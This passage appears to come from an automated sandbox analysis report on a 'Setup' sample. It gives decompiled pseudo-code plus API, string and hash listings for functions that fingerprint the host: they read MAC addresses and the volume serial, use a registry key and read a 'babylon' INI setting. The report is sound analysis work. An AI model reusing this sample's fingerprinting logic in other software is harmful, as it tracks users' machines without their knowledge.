                                                                                                                                                              				intOrPtr _v84;
                                                                                                                                                              				void* __ebp;
                                                                                                                                                              				signed int _t70;
                                                                                                                                                              				signed int _t71;
                                                                                                                                                              				signed int _t75;
                                                                                                                                                              				signed int _t76;
                                                                                                                                                              				void* _t78;
                                                                                                                                                              				signed int _t81;
                                                                                                                                                              				intOrPtr _t82;
                                                                                                                                                              				signed int _t91;
                                                                                                                                                              				signed int _t119;
                                                                                                                                                              				void* _t123;
                                                                                                                                                              				void* _t126;
                                                                                                                                                              				signed int _t127;
                                                                                                                                                              				void* _t128;
                                                                                                                                                              				void* _t130;
                                                                                                                                                              
                                                                                                                                                              				_t126 = __esi;
                                                                                                                                                              				_t125 = __edi;
                                                                                                                                                              				_t95 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x50819f);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t70 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t71 = _t70 ^ _t127;
                                                                                                                                                              				_v28 = _t71;
                                                                                                                                                              				_push(_t71);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v80 = __ecx;
                                                                                                                                                              				_v76 = 0;
                                                                                                                                                              				_v24 = 0;
                                                                                                                                                              				_v56 = 0;
                                                                                                                                                              				_v54 = 0;
                                                                                                                                                              				_v50 = 0;
                                                                                                                                                              				_v46 = 0;
                                                                                                                                                              				_v42 = 0;
                                                                                                                                                              				_v38 = 0;
                                                                                                                                                              				_v34 = 0;
                                                                                                                                                              				_t116 =  &_v24;
                                                                                                                                                              				_push( &_v24);
                                                                                                                                                              				_push(0);
                                                                                                                                                              				_push(0);
                                                                                                                                                              				_push(0);
                                                                                                                                                              				_push(0); // executed
                                                                                                                                                              				L0044F178(); // executed
                                                                                                                                                              				_t75 = E0044FBD9(__ebx,  &_v24, __edi, _v24);
                                                                                                                                                              				_t130 = _t128 - 0x44 + 4;
                                                                                                                                                              				_v20 = _t75;
                                                                                                                                                              				if(_v20 != 0) {
                                                                                                                                                              					_push( &_v24);
                                                                                                                                                              					_t76 = _v20;
                                                                                                                                                              					_push(_t76);
                                                                                                                                                              					_push(0);
                                                                                                                                                              					_push(0);
                                                                                                                                                              					_push(0); // executed
                                                                                                                                                              					L0044F178(); // executed
                                                                                                                                                              					__eflags = _t76;
                                                                                                                                                              					if(__eflags == 0) {
                                                                                                                                                              						_v57 = 1;
                                                                                                                                                              						_v64 = _v20;
                                                                                                                                                              						while(1) {
                                                                                                                                                              							__eflags = _v57 & 0x000000ff;
                                                                                                                                                              							if((_v57 & 0x000000ff) == 0) {
                                                                                                                                                              								break;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _v64;
                                                                                                                                                              							if(_v64 != 0) {
                                                                                                                                                              								_t119 = _v64;
                                                                                                                                                              								__eflags =  *((intOrPtr*)(_t119 + 0x34)) - 6;
                                                                                                                                                              								if( *((intOrPtr*)(_t119 + 0x34)) >= 6) {
                                                                                                                                                              									_v84 = 6;
                                                                                                                                                              								} else {
                                                                                                                                                              									_v84 =  *((intOrPtr*)(_v64 + 0x34));
                                                                                                                                                              								}
                                                                                                                                                              								_v24 = _v84;
                                                                                                                                                              								_v68 = 0;
                                                                                                                                                              								while(1) {
                                                                                                                                                              									__eflags = _v68 - _v24;
                                                                                                                                                              									if(_v68 >= _v24) {
                                                                                                                                                              										break;
                                                                                                                                                              									}
                                                                                                                                                              									_t123 = _v64 + _v68;
                                                                                                                                                              									__eflags =  *(_t123 + 0x2c) & 0x000000ff;
                                                                                                                                                              									if(( *(_t123 + 0x2c) & 0x000000ff) != 0) {
                                                                                                                                                              										_v57 = 0;
                                                                                                                                                              									}
                                                                                                                                                              									wsprintfW(_t127 + (_v68 << 1) * 2 - 0x34, L"%02X",  *(_v64 + _v68 + 0x2c) & 0x000000ff);
                                                                                                                                                              									_t130 = _t130 + 0xc;
                                                                                                                                                              									_t91 = _v68 + 1;
                                                                                                                                                              									__eflags = _t91;
                                                                                                                                                              									_v68 = _t91;
                                                                                                                                                              								}
                                                                                                                                                              								_v64 =  *((intOrPtr*)(_v64 + 8));
                                                                                                                                                              								continue;
                                                                                                                                                              							}
                                                                                                                                                              							break;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags = _v57 & 0x000000ff;
                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                              							__eflags = 0;
                                                                                                                                                              							_v56 = 0;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_push(_v20);
                                                                                                                                                              					E0044FAFC(_t95, _t125, _t126, __eflags);
                                                                                                                                                              					_t78 = E00434050( &_v70);
                                                                                                                                                              					_t116 =  &_v56;
                                                                                                                                                              					E00417910( &_v56, _t78);
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					_t81 = _v76 | 0x00000001;
                                                                                                                                                              					__eflags = _t81;
                                                                                                                                                              					_v76 = _t81;
                                                                                                                                                              					_t82 = _a4;
                                                                                                                                                              				} else {
                                                                                                                                                              					E004175C0(E00434050( &_v69));
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					_v76 = _v76 | 0x00000001;
                                                                                                                                                              					_t82 = _a4;
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return E0044F6C8(_t82, _t95, _v28 ^ _t127, _t116, _t125, _t126);
                                                                                                                                                              			}







































                                                                                                                                                              APIs
                                                                                                                                                              • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,00000000), ref: 004833CF
                                                                                                                                                              • _malloc.LIBCMT ref: 004833D8
                                                                                                                                                                • Part of subcall function 0044FBD9: __FF_MSGBANNER.LIBCMT ref: 0044FBFC
                                                                                                                                                                • Part of subcall function 0044FBD9: __NMSG_WRITE.LIBCMT ref: 0044FC03
                                                                                                                                                                • Part of subcall function 0044FBD9: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,00457755,?,00000001,?,?,00457D86,00000018,005444D8,0000000C,00457E17), ref: 0044FC50
                                                                                                                                                              • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,00000000), ref: 00483420
                                                                                                                                                              • wsprintfW.USER32 ref: 004834B7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AdaptersAddresses$AllocateHeap_mallocwsprintf
                                                                                                                                                              • String ID: %02X
                                                                                                                                                              • API String ID: 1271595815-436463671
                                                                                                                                                              • Opcode ID: d98c3d86e2023d1da9d40ef67c3cdeb00527ce2c862d077feb75bdbbf60aef80
                                                                                                                                                              • Instruction ID: 74c00cfa6e4194ed32f9d88a42d5c1b14a641d40552b31fe4e7540d7c5541a95
                                                                                                                                                              • Opcode Fuzzy Hash: d98c3d86e2023d1da9d40ef67c3cdeb00527ce2c862d077feb75bdbbf60aef80
                                                                                                                                                              • Instruction Fuzzy Hash: 78514B70E04248DFDB08DF99D881BEEBBB1BF48B05F10452EE405A7380D774AA05CB59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                              			E00482B50(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				char _v48;
                                                                                                                                                              				void* _v52;
                                                                                                                                                              				char _v60;
                                                                                                                                                              				char _v128;
                                                                                                                                                              				char _v132;
                                                                                                                                                              				char _v164;
                                                                                                                                                              				char _v192;
                                                                                                                                                              				char _v193;
                                                                                                                                                              				char _v194;
                                                                                                                                                              				signed int _v200;
                                                                                                                                                              				intOrPtr _v204;
                                                                                                                                                              				intOrPtr _v208;
                                                                                                                                                              				intOrPtr _v212;
                                                                                                                                                              				char _v216;
                                                                                                                                                              				intOrPtr _v220;
                                                                                                                                                              				intOrPtr _v224;
                                                                                                                                                              				signed int _t57;
                                                                                                                                                              				signed int _t58;
                                                                                                                                                              				intOrPtr _t62;
                                                                                                                                                              				void* _t69;
                                                                                                                                                              				signed int _t73;
                                                                                                                                                              				intOrPtr _t76;
                                                                                                                                                              				signed int _t115;
                                                                                                                                                              
                                                                                                                                                              				_t114 = __esi;
                                                                                                                                                              				_t113 = __edi;
                                                                                                                                                              				_t86 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x50a6fb);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t57 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t58 = _t57 ^ _t115;
                                                                                                                                                              				_v20 = _t58;
                                                                                                                                                              				_push(_t58);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v200 = 0;
                                                                                                                                                              				E00434E30( &_v60);
                                                                                                                                                              				_v8 = 1;
                                                                                                                                                              				_t62 = E00482980(__ebx, __edi, __esi, __eflags,  &_v164, "LIpq0hKVkVaLMSLNpdvbwZ1ujeVTM3C6kW4BzYpnFeY3Qs6E"); // executed
                                                                                                                                                              				_v204 = _t62;
                                                                                                                                                              				_v208 = _v204;
                                                                                                                                                              				_v8 = 2;
                                                                                                                                                              				_v212 = _v208;
                                                                                                                                                              				if(_v212 == 0) {
                                                                                                                                                              					_v216 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v216 = _v212 + 4;
                                                                                                                                                              				}
                                                                                                                                                              				_t111 =  &_v192;
                                                                                                                                                              				_v220 = E00409760( &_v192, L"Software\\", _v216);
                                                                                                                                                              				_v224 = _v220;
                                                                                                                                                              				_v8 = 3;
                                                                                                                                                              				E00409810(_v224);
                                                                                                                                                              				_v8 = 5;
                                                                                                                                                              				E004178C0( &_v192);
                                                                                                                                                              				_v8 = 6;
                                                                                                                                                              				E004176E0();
                                                                                                                                                              				_t69 = E0041EEA0( &_v60, 0x80000001, E00416A30( &_v48), 1); // executed
                                                                                                                                                              				if(_t69 != 0) {
                                                                                                                                                              					L6:
                                                                                                                                                              					E00417910("0", E00434050( &_v194));
                                                                                                                                                              					_t73 = _v200 | 0x00000001;
                                                                                                                                                              					__eflags = _t73;
                                                                                                                                                              					_v200 = _t73;
                                                                                                                                                              					_v8 = 1;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E0041EF60( &_v60);
                                                                                                                                                              					_t76 = _a4;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v132 = 0x20;
                                                                                                                                                              					_t111 =  &_v132;
                                                                                                                                                              					if(E0041EDE0( &_v60, L"version",  &_v128,  &_v132) != 0) {
                                                                                                                                                              						goto L6;
                                                                                                                                                              					} else {
                                                                                                                                                              						E00417910( &_v128, E00434050( &_v193));
                                                                                                                                                              						_t111 = _v200 | 0x00000001;
                                                                                                                                                              						_v200 = _v200 | 0x00000001;
                                                                                                                                                              						_v8 = 1;
                                                                                                                                                              						E004176E0();
                                                                                                                                                              						_v8 = 0;
                                                                                                                                                              						E0041EF60( &_v60);
                                                                                                                                                              						_t76 = _a4;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return E0044F6C8(_t76, _t86, _v20 ^ _t115, _t111, _t113, _t114);
                                                                                                                                                              			}






























                                                                                                                                                              APIs
                                                                                                                                                              • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00482B88
                                                                                                                                                                • Part of subcall function 00482980: __wsplitpath.LIBCMT ref: 00482A17
                                                                                                                                                                • Part of subcall function 00482980: PathAddBackslashW.SHLWAPI(?), ref: 00482A26
                                                                                                                                                                • Part of subcall function 00482980: GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00482A43
                                                                                                                                                                • Part of subcall function 00482980: _sprintf.LIBCMT ref: 00482A59
                                                                                                                                                                • Part of subcall function 00482980: _strlen.LIBCMT ref: 00482A6F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: BackslashInformationIterator_baseIterator_base::_PathVolume__wsplitpath_sprintf_strlenstd::_
                                                                                                                                                              • String ID: $LIpq0hKVkVaLMSLNpdvbwZ1ujeVTM3C6kW4BzYpnFeY3Qs6E$Software\$version
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                              			E004D6EA0(void* __ebx, void* __edi, void* __esi, void* __eflags, WCHAR* _a4, intOrPtr _a8, char _a12) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				char _v48;
                                                                                                                                                              				char _v52;
                                                                                                                                                              				char _v574;
                                                                                                                                                              				short _v576;
                                                                                                                                                              				char _v577;
                                                                                                                                                              				char _v612;
                                                                                                                                                              				char _v613;
                                                                                                                                                              				intOrPtr _v620;
                                                                                                                                                              				char _v652;
                                                                                                                                                              				char _v653;
                                                                                                                                                              				intOrPtr _v660;
                                                                                                                                                              				signed int _t46;
                                                                                                                                                              				signed int _t47;
                                                                                                                                                              				signed char _t54;
                                                                                                                                                              				intOrPtr _t61;
                                                                                                                                                              				short _t63;
                                                                                                                                                              				WCHAR* _t65;
                                                                                                                                                              				void* _t68;
                                                                                                                                                              				signed int _t107;
                                                                                                                                                              
                                                                                                                                                              				_t106 = __esi;
                                                                                                                                                              				_t105 = __edi;
                                                                                                                                                              				_t75 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x509cb9);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t46 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t47 = _t46 ^ _t107;
                                                                                                                                                              				_v20 = _t47;
                                                                                                                                                              				_push(_t47);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				E004175C0(E00434050( &_v577));
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				E00495D00(__ebx, __edi, __esi, 0x10,  &_v52, 1, 1); // executed
                                                                                                                                                              				E004130D0( &_v48, L"Methods.txt");
                                                                                                                                                              				if(_a12 == 0) {
                                                                                                                                                              					_a12 = 0x534fe4;
                                                                                                                                                              				}
                                                                                                                                                              				_t54 = E0049E7E0( &_v52, 0); // executed
                                                                                                                                                              				if((_t54 & 0x000000ff) == 0) {
                                                                                                                                                              					L5:
                                                                                                                                                              					E00417910(_a12, E00434050( &_v653));
                                                                                                                                                              					_v8 = 2;
                                                                                                                                                              					_t103 =  &_v652;
                                                                                                                                                              					E004181D0(_a8,  &_v652);
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              					_v660 = E0042E0C0(_a8 + 4);
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              					_t61 = _v660;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t63 =  *0x534fe8; // 0x0
                                                                                                                                                              					_v576 = _t63;
                                                                                                                                                              					E00451D90(_t105,  &_v574, 0, 0x206);
                                                                                                                                                              					_t65 = E00416A30( &_v48);
                                                                                                                                                              					_t15 =  &_a12; // 0x534fe4
                                                                                                                                                              					if(GetPrivateProfileStringW(L"babylon", _a4,  *_t15,  &_v576, 0x104, _t65) <= 0) {
                                                                                                                                                              						goto L5;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t68 = E00434050( &_v613);
                                                                                                                                                              						_t103 =  &_v576;
                                                                                                                                                              						E00417910( &_v576, _t68);
                                                                                                                                                              						_v8 = 1;
                                                                                                                                                              						E004181D0(_a8,  &_v612);
                                                                                                                                                              						_v8 = 0;
                                                                                                                                                              						E004176E0();
                                                                                                                                                              						_v620 = E0042E0C0(_a8 + 4);
                                                                                                                                                              						_v8 = 0xffffffff;
                                                                                                                                                              						E004176E0();
                                                                                                                                                              						_t61 = _v620;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return E0044F6C8(_t61, _t75, _v20 ^ _t107, _t103, _t105, _t106);
                                                                                                                                                              			}


                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00495D00: _memset.LIBCMT ref: 00495D56
                                                                                                                                                                • Part of subcall function 00495D00: SHGetFolderPathW.SHELL32(00000000,004CC849,00000000,00000000,?,?,?,DDD124F9), ref: 00495D6F
                                                                                                                                                                • Part of subcall function 00495D00: PathAddBackslashW.SHLWAPI(?,?,?,DDD124F9), ref: 00495D93
                                                                                                                                                              • _memset.LIBCMT ref: 004D6F46
                                                                                                                                                              • GetPrivateProfileStringW.KERNEL32 ref: 004D6F70
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Path_memset$BackslashFolderPrivateProfileString
                                                                                                                                                              • String ID: Methods.txt$babylon$OS
                                                                                                                                                              • API String ID: 3325740732-1399207056
                                                                                                                                                              • Opcode ID: 52b30a422257a18270aaca82f2a37bb098eeeedba23f74cb0a839e0075fee11b
                                                                                                                                                              • Instruction ID: 98828ad401be4145f9bc075ff7626690436c1c006785f8cac0dd7b97ecea69fe
                                                                                                                                                              • Opcode Fuzzy Hash: 52b30a422257a18270aaca82f2a37bb098eeeedba23f74cb0a839e0075fee11b
                                                                                                                                                              • Instruction Fuzzy Hash: 44418A70904218ABDB14EF65DC55FEEB774BF04304F00869EF416A7291EF786A88CB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                              			E00483240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				short _v14;
                                                                                                                                                              				intOrPtr _v18;
                                                                                                                                                              				short _v20;
                                                                                                                                                              				char _v538;
                                                                                                                                                              				short _v540;
                                                                                                                                                              				intOrPtr _v544;
                                                                                                                                                              				signed int _t17;
                                                                                                                                                              				signed int _t42;
                                                                                                                                                              
                                                                                                                                                              				_t40 = __edi;
                                                                                                                                                              				_t17 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_v12 = _t17 ^ _t42;
                                                                                                                                                              				_v544 = __ecx;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_v540 = 0;
                                                                                                                                                              				E00451D90(__edi,  &_v538, 0, 0x206);
                                                                                                                                                              				_v20 = 0;
                                                                                                                                                              				_v18 = 0;
                                                                                                                                                              				_v14 = 0;
                                                                                                                                                              				GetSystemDirectoryW( &_v540, 0x104);
                                                                                                                                                              				E0045508B( &_v540,  &_v20, 0, 0, 0);
                                                                                                                                                              				PathAddBackslashW( &_v20);
                                                                                                                                                              				GetVolumeInformationW( &_v20, 0, 0,  &_v8, 0, 0, 0, 0); // executed
                                                                                                                                                              				return E0044F6C8(_v8, __ebx, _v12 ^ _t42,  &_v8, _t40, __esi);
                                                                                                                                                              			}














                                                                                                                                                              APIs
                                                                                                                                                              • _memset.LIBCMT ref: 00483277
                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0048329A
                                                                                                                                                              • __wsplitpath.LIBCMT ref: 004832B1
                                                                                                                                                                • Part of subcall function 0045508B: __wsplitpath_helper.LIBCMT ref: 004550CD
                                                                                                                                                              • PathAddBackslashW.SHLWAPI(?), ref: 004832BD
                                                                                                                                                              • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004832D7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: BackslashDirectoryInformationPathSystemVolume__wsplitpath__wsplitpath_helper_memset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1689572191-0
                                                                                                                                                              • Opcode ID: 2722dadde5231e78c0d286f39f3dd65ddbc6d3ea9816a338ea9d09ee777a4c26
                                                                                                                                                              • Instruction ID: fc4c74856658e11cbbe3bb0a7f27a8096cd90a6f71694732b6bea6d2f2d74394
                                                                                                                                                              • Opcode Fuzzy Hash: 2722dadde5231e78c0d286f39f3dd65ddbc6d3ea9816a338ea9d09ee777a4c26
                                                                                                                                                              • Instruction Fuzzy Hash: BC119871A9030CABD710DBA4DC4AFED7378AF18700F504559B605A61D0EB706608CB54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 30%
                                                                                                                                                              			E0044FAFC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                              				intOrPtr* _t10;
                                                                                                                                                              				intOrPtr _t13;
                                                                                                                                                              				intOrPtr _t23;
                                                                                                                                                              				void* _t25;
                                                                                                                                                              
                                                                                                                                                              				_push(0xc);
                                                                                                                                                              				_push(0x544138);
                                                                                                                                                              				_t8 = E00456860(__ebx, __edi, __esi);
                                                                                                                                                              				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                                                                                                                              				if(_t23 == 0) {
                                                                                                                                                              					L9:
                                                                                                                                                              					return E004568A5(_t8);
                                                                                                                                                              				}
                                                                                                                                                              				if( *0x5c41c0 != 3) {
                                                                                                                                                              					_push(_t23);
                                                                                                                                                              					L7:
                                                                                                                                                              					_push(0);
                                                                                                                                                              					_t8 = RtlFreeHeap( *0x5bccc0); // executed
                                                                                                                                                              					_t31 = _t8;
                                                                                                                                                              					if(_t8 == 0) {
                                                                                                                                                              						_t10 = E00454477(_t31);
                                                                                                                                                              						 *_t10 = E00454435(GetLastError());
                                                                                                                                                              					}
                                                                                                                                                              					goto L9;
                                                                                                                                                              				}
                                                                                                                                                              				E00457DFC(__ebx, 4);
                                                                                                                                                              				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                                                                              				_t13 = E00457E2F(_t23);
                                                                                                                                                              				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                                                                                                                              				if(_t13 != 0) {
                                                                                                                                                              					_push(_t23);
                                                                                                                                                              					_push(_t13);
                                                                                                                                                              					E00457E5F();
                                                                                                                                                              				}
                                                                                                                                                              				 *(_t25 - 4) = 0xfffffffe;
                                                                                                                                                              				_t8 = E0044FB52();
                                                                                                                                                              				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                                                                                                                              					goto L9;
                                                                                                                                                              				} else {
                                                                                                                                                              					_push( *((intOrPtr*)(_t25 + 8)));
                                                                                                                                                              					goto L7;
                                                                                                                                                              				}
                                                                                                                                                              			}








                                                                                                                                                              APIs
                                                                                                                                                              • __lock.LIBCMT ref: 0044FB1A
                                                                                                                                                                • Part of subcall function 00457DFC: __mtinitlocknum.LIBCMT ref: 00457E12
                                                                                                                                                                • Part of subcall function 00457DFC: __amsg_exit.LIBCMT ref: 00457E1E
                                                                                                                                                                • Part of subcall function 00457DFC: EnterCriticalSection.KERNEL32(?,?,?,004574AB,0000000D,00544470,00000008,00451FA2,?,00000000), ref: 00457E26
                                                                                                                                                              • ___sbh_find_block.LIBCMT ref: 0044FB25
                                                                                                                                                              • ___sbh_free_block.LIBCMT ref: 0044FB34
                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,?,00544138,0000000C,004573F1,00000000,?,00457755,?,00000001,?,?,00457D86,00000018,005444D8,0000000C), ref: 0044FB64
                                                                                                                                                              • GetLastError.KERNEL32(?,00457755,?,00000001,?,?,00457D86,00000018,005444D8,0000000C,00457E17,?,?,?,004574AB,0000000D), ref: 0044FB75
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2714421763-0
                                                                                                                                                              • Opcode ID: 6c279857df97adcd3416c356afbc1c3f317e37527fb5748225cca4b9199e88d9
                                                                                                                                                              • Instruction ID: f78cea26cd6aa1b3e2274e40fd7ff0d3506b0f84db429095f7dfc35530fda498
                                                                                                                                                              • Opcode Fuzzy Hash: 6c279857df97adcd3416c356afbc1c3f317e37527fb5748225cca4b9199e88d9
                                                                                                                                                              • Instruction Fuzzy Hash: 5F01D431801301EAEB206BB1DC16B5F3B60EF1172AF50412AF80496192CB3CA98CDA5C
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                                              			E004E74E0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edi, intOrPtr __esi, char* _a4, intOrPtr _a8, char _a12, char _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                              				signed char _v8;
                                                                                                                                                              				signed char _v12;
                                                                                                                                                              				signed int _v16;
                                                                                                                                                              				char _v540;
                                                                                                                                                              				signed int _v544;
                                                                                                                                                              				signed char _v548;
                                                                                                                                                              				signed char _v552;
                                                                                                                                                              				signed char _v556;
                                                                                                                                                              				char _v560;
                                                                                                                                                              				signed char _v561;
                                                                                                                                                              				intOrPtr _v568;
                                                                                                                                                              				signed int _v572;
                                                                                                                                                              				signed int _t56;
